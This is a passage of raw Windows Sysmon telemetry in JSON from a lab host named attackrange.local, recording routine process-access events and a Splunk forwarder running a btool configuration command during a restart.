C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3083,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3084,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3085,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3086,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3087,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF2-5F25-0000-001050490500}\r\nTargetProcessId: 4376\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF2-5F25-0000-001050490500}","TargetProcessId":"4376","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3088,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.029\r\nProcessGuid: {41C8662E-1FF3-5F25-0000-00100B4C0500}\r\nProcessId: 4484\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1FEF-5F25-0000-00106D380500}\r\nParentProcessId: 2584\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=2488","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.029","ProcessGuid":"{41C8662E-1FF3-5F25-0000-00100B4C0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1FEF-5F25-0000-00106D380500}","ParentProcessId":"2584","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=2488","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3089,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.015\r\nSourceProcessGUID: {41C8662E-1FEF-5F25-0000-00106D380500}\r\nSourceProcessId: 2584\r\nSourceThreadId: 3476\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00100B4C0500}\r\nTargetProcessId: 4484\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1893f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+17106|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1385a|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+12176|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+19082|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d94e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.015","SourceProcessGUID":"{41C8662E-1FEF-5F25-0000-00106D380500}","SourceProcessId":"2584","SourceThreadId":"3476","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00100B4C0500}","TargetProcessId":"4484","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1893f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+17106|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1385a|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+12176|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+19082|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d94e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3090,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.015\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00100B4C0500}\r\nTargetProcessId: 4484\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.015","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00100B4C0500}","TargetProcessId":"4484","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
